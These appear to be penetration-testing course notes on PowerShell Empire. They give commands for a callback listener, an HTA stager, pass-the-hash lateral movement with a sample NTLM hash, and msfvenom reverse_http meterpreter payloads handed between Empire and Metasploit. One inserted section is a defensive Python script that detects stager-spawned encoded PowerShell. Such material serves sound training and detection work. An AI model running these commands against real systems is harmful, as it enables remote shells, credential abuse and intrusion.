
# Module 23 (PowerShell Empire)

## PowerShell Empire

### Listener

```
// Empire commands used
?
uselistener http
info
```


Starting the listener:

```bash
execute
```

### Stager

The stager downloads and executes the final payload, which calls back to the listener set up previously (`http`). Set it up as follows:

```bash
//specify what stager to use
usestager windows/hta

//associate stager with the http listener
set Listener http

//write stager to the file
set OutFile stage.hta

//create the stager
execute
```
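
From the defender's side, the stagers on this page show up as a recognizable process tree. The following is an added example, not part of the original page and not Empire code: it triages process-creation events for `powershell.exe` started by `mshta.exe` or `cmd.exe` with an encoded command and decodes that command for the analyst. The Sysmon-style field names, the sample events and the assumption that the stager launches PowerShell with an encoded-command flag are assumptions of this example.

```python
import base64
import re

# Parents that host the two stagers on this page: mshta.exe runs stage.hta and
# cmd.exe runs launcher.bat (assumption: both go on to start powershell.exe).
STAGER_PARENTS = {"mshta.exe", "cmd.exe"}
FLAG_RE = re.compile(r"\s-(e\w*)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"\s-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def decode_encoded_command(blob):
    """-EncodedCommand carries base64 over UTF-16LE text; None if not decodable."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(event):
    """Return a finding for a stager-shaped process creation, else None."""
    if basename(event["Image"]) != "powershell.exe":
        return None
    parent = basename(event["ParentImage"])
    if parent not in STAGER_PARENTS:
        return None
    for flag, blob in FLAG_RE.findall(event["CommandLine"]):
        # PowerShell accepts any prefix of -EncodedCommand (-e, -enc, ...).
        if "encodedcommand".startswith(flag.lower()):
            return {"parent": parent,
                    "hidden_window": bool(HIDDEN_RE.search(event["CommandLine"])),
                    "decoded": decode_encoded_command(blob)}
    return None

# Constructed sample events; field names follow Sysmon Event ID 1.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
BLOB = base64.b64encode("Write-Output 'constructed sample'".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": f"powershell.exe -noP -sta -w 1 -enc {BLOB}"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\ops\backup.ps1"},
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": f"powershell.exe -enc {BLOB}"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

The second and third sample events show the two conditions working together: a `cmd.exe` parent without an encoded command and an encoded command under `explorer.exe` both return no finding.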


### Lateral Movement

```bash
usemodule lateral_movement/technique
usemodule lateral_movement/invoke_smbexec
```

```
set ComputerName client251
set Listener http
set Username jeff_admin
set Hash e2b475c11da2a0748290d87aa966c327
set Domain corp.com
execute
```

### Switching Between Empire and Metasploit

Metasploit to Empire

```
msfvenom -p windows/meterpreter/reverse_http LHOST=10.11.0.4 LPORT=7777 -f exe -o met.exe
use multi/handler
set payload windows/meterpreter/reverse_http
set LPORT 7777
set LHOST 10.11.0.4
run
```

Empire

```
upload /home/h3ckt0r/met.exe
shell dir
shell C:\Users\offsec.corp\Downloads>met.exe
```

Empire to Metasploit

```
usestager windows/launcher_bat
set Listener http
execute
```

Metasploit

```
upload /tmp/launcher.bat
shell
dir
launcher.bat
```

